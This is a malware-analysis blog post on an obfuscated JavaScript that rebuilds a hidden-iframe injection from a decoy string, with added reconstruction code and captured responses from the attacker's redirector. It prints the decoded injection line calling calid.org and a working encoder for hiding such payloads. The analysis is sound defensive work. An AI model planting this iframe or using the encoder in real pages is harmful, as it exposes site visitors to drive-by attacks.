ZION SECURITY (EN): Analysis of an unknown malicious JavaScript
document.write('<iframe src="http://calid.org/pro/in.cgi?2" style="display: none"></iframe>');
The script is built by selecting one character at a time from the long string above, appending it to the previous value of getCharWord, and looping until getCharWord holds the complete malicious payload. At the end the reconstructed string is executed with eval(). The decoy string itself is never executed; only the characters at the selected positions matter, so the visible string can be padded with arbitrary harmless-looking text.
This resembles a JavaScript form of steganography: the code is hidden inside what looks like an innocuous string in other JavaScript. We have not seen this way of working discussed on the Internet yet, and we have not identified a library that generates this type of code. We do not believe it was written by hand, because producing the character positions manually would be a lot of work. The e-mail obfuscator at http://www.mcdonaldland.info/emailobfuscator/ produces output with a close resemblance.
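The following is an added reconstruction of the technique described above, not the sample's own code: the real decoy string, its index sequence and the generator used are not on this page, so the encoder (hideInDecoy) and the seeded filler are assumptions. The decoder (rebuildPayload) is the loop the analysis describes; the only difference is that the result is returned instead of being passed to eval(). The payload string is the decoded document.write shown earlier. The last two helpers show how an analyst can execute the rebuilt code against a stub document to capture what it would have written, without touching a real DOM.

```javascript
// Added example: reconstruction of the character-picking obfuscation.
// Assumption: the real sample's decoy string, indices and generator are unknown;
// the decoded payload below is the document.write from the analysis.

const PAYLOAD =
  "document.write('<iframe src=\"http://calid.org/pro/in.cgi?2\" style=\"display: none\"></iframe>');";

// Small deterministic PRNG (LCG) so the decoy is reproducible offline.
function lcg(seed) {
  let s = seed >>> 0;
  return () => {
    s = (Math.imul(s, 1664525) + 1013904223) >>> 0;
    return s;
  };
}

const FILLER = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";

// Hypothetical encoder: scatters the payload's characters through random filler
// and records the position where each real character landed.
function hideInDecoy(payload, seed = 42) {
  const rnd = lcg(seed);
  let decoy = "";
  const indices = [];
  for (const ch of payload) {
    const pad = rnd() % 4; // 0-3 junk characters before each real one
    for (let i = 0; i < pad; i++) decoy += FILLER[rnd() % FILLER.length];
    indices.push(decoy.length);
    decoy += ch;
  }
  // Trailing junk so the payload does not end where the string ends.
  for (let i = 0; i < 8; i++) decoy += FILLER[rnd() % FILLER.length];
  return { decoy, indices };
}

// Decoder: the loop the analysis describes. One character is picked per
// iteration and appended to getCharWord until the payload is complete.
// The original ends in eval(getCharWord); here the string is returned.
function rebuildPayload(decoy, indices) {
  let getCharWord = "";
  for (let i = 0; i < indices.length; i++) {
    getCharWord = getCharWord + decoy.charAt(indices[i]);
  }
  return getCharWord;
}

// Analyst's sink: run the rebuilt code with a stub document so document.write
// is captured instead of reaching a real DOM. new Function is used rather than
// eval so the code only sees the stub passed in as its "document" parameter.
function runWithStubDocument(code) {
  const written = [];
  const stubDocument = { write: (html) => written.push(html) };
  new Function("document", code)(stubDocument);
  return written;
}

// Pull every iframe's src and style out of captured HTML.
function extractIframes(html) {
  const out = [];
  const re = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const attrs = m[1];
    const src = /src=["']([^"']*)["']/i.exec(attrs);
    const style = /style=["']([^"']*)["']/i.exec(attrs);
    out.push({ src: src ? src[1] : null, style: style ? style[1] : null });
  }
  return out;
}

// Usage: encode, decode and inspect without ever executing the payload for real.
const { decoy, indices } = hideInDecoy(PAYLOAD);
const recovered = rebuildPayload(decoy, indices);
const written = runWithStubDocument(recovered);
console.log(decoy.length + "-byte decoy hides " + indices.length + " payload characters");
console.log(extractIframes(written.join("")));
```

When triaging a real sample, the same idea applies: replace eval (or document.write) with a function that records its argument, and never let the rebuilt string run in a browser with a live DOM.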
The response from the iframe's URL (http://calid.org/pro/in.cgi?2) was unexpected: a 302 redirect to google.com that first sets a cookie scoped to calid.org.
HTTP/1.1 302 Found
Date: Thu, 17 Sep 2009 17:31:00 GMT
Server: Apache/2
Set-Cookie: SL_3_0000=_0_; domain=calid.org; path=/; expires=Mon, 21-Sep-2009 17:31:00 GMT
Location: http://google.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 162

<html><head><meta http-equiv="REFRESH" content="1; URL='http://google.com'"></head><body>document moved <a href="http://google.com">here</a></body></html>
Changing the URL to
HTTP/1.1 200 OK
Date: Thu, 17 Sep 2009 17:30:20 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 162

Error: can't open redirects.log file (1)

Possible reasons:
1) cron is not working (read FAQ)
2) there is no urls in this scheme
3) there is no such scheme or user
We assume this is deliberate: inject the hidden iframe into as many sites as possible while the redirector sends visitors harmlessly to google.com, and wait until enough victims are reachable. The next step would then be to feed the CGI on calid.org a malicious payload, so that every injected site starts serving it at once. The error text supports this reading: it speaks of redirect "schemes", users and a cron job that fills redirects.log, which is the vocabulary of a redirector serving several rule sets, and the parameter 2 in in.cgi?2 appears to select one of them (the modified URL hit a scheme that does not exist). Because the iframe target is a redirector under the attacker's control, a harmless response at analysis time says nothing about what visitors will receive later; an injected site must be treated as compromised regardless. Another assumption is that this CGI is used to control a botnet and that it is only a gateway until it is upgraded.
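To repeat this check without a browser, the two captured responses can be parsed and classified mechanically. The following is an added example, not part of the original analysis: the two samples are the responses shown above, reassembled with one header per line (the exact body bytes of the original are not reproduced), and the verdict labels are this example's own, not the redirector's.

```javascript
// Added example: parse raw HTTP/1.1 responses from the redirector and classify
// what it did. Samples are the page's two responses, reassembled (constructed
// line breaks; not byte-exact copies of the original bodies).

const REDIRECT_SAMPLE = [
  "HTTP/1.1 302 Found",
  "Date: Thu, 17 Sep 2009 17:31:00 GMT",
  "Server: Apache/2",
  "Set-Cookie: SL_3_0000=_0_; domain=calid.org; path=/; expires=Mon, 21-Sep-2009 17:31:00 GMT",
  "Location: http://google.com",
  "Vary: Accept-Encoding,User-Agent",
  "Content-Type: text/html",
  "Content-Length: 162",
  "",
  "<html><head><meta http-equiv=\"REFRESH\" content=\"1; URL='http://google.com'\"></head><body>document moved <a href=\"http://google.com\">here</a></body></html>",
].join("\r\n");

const ERROR_SAMPLE = [
  "HTTP/1.1 200 OK",
  "Date: Thu, 17 Sep 2009 17:30:20 GMT",
  "Server: Apache/2",
  "Vary: Accept-Encoding,User-Agent",
  "Content-Type: text/plain",
  "Content-Length: 162",
  "",
  "Error: can't open redirects.log file (1)",
  "",
  "Possible reasons:",
  "1) cron is not working (read FAQ)",
  "2) there is no urls in this scheme",
  "3) there is no such scheme or user",
].join("\r\n");

// Split a raw response into status, headers and body.
function parseHttpResponse(raw) {
  const sep = raw.indexOf("\r\n\r\n");
  const head = sep === -1 ? raw : raw.slice(0, sep);
  const body = sep === -1 ? "" : raw.slice(sep + 4);
  const lines = head.split("\r\n");
  const status = /^HTTP\/\d\.\d (\d{3})\s*(.*)$/.exec(lines[0]);
  if (!status) throw new Error("not an HTTP status line: " + lines[0]);
  // Header names are case-insensitive; values are kept as a list because a
  // header such as Set-Cookie may legitimately appear more than once.
  const headers = {};
  for (const line of lines.slice(1)) {
    const colon = line.indexOf(":");
    if (colon === -1) continue;
    const name = line.slice(0, colon).trim().toLowerCase();
    const value = line.slice(colon + 1).trim();
    (headers[name] = headers[name] || []).push(value);
  }
  return { status: Number(status[1]), reason: status[2], headers, body };
}

function firstHeader(res, name) {
  const values = res.headers[name.toLowerCase()];
  return values ? values[0] : undefined;
}

// Break a Set-Cookie value into name, value and attributes (domain, path, ...).
function parseSetCookie(value) {
  const parts = value.split(";").map((p) => p.trim());
  const [name, ...rest] = parts[0].split("=");
  const attrs = {};
  for (const p of parts.slice(1)) {
    const eq = p.indexOf("=");
    if (eq === -1) attrs[p.toLowerCase()] = true;
    else attrs[p.slice(0, eq).toLowerCase()] = p.slice(eq + 1);
  }
  return { name, value: rest.join("="), attrs };
}

// Verdict labels are this example's own.
function classifyRedirectorResponse(raw) {
  const res = parseHttpResponse(raw);
  const setCookie = firstHeader(res, "Set-Cookie");
  const location = firstHeader(res, "Location");
  let verdict;
  if (res.status >= 300 && res.status < 400 && location) {
    verdict = "redirect:" + location; // placeholder redirect, e.g. to google.com
  } else if (/can't open redirects\.log/.test(res.body)) {
    verdict = "unconfigured-scheme"; // no redirect rules for this scheme/user
  } else if (/<iframe|<script|document\.write/i.test(res.body)) {
    verdict = "active-content"; // something is being served now: treat as live payload
  } else {
    verdict = "other";
  }
  return { verdict, status: res.status, cookie: setCookie ? parseSetCookie(setCookie) : null };
}

console.log(classifyRedirectorResponse(REDIRECT_SAMPLE));
console.log(classifyRedirectorResponse(ERROR_SAMPLE));
```

Capture the raw responses with a client that does not follow redirects (for example curl -i without -L) from a disposable host, so the 302 and its Set-Cookie are seen rather than the google.com page it points to; re-run the classification periodically, since a verdict of "active-content" is the signal that the redirector has been armed.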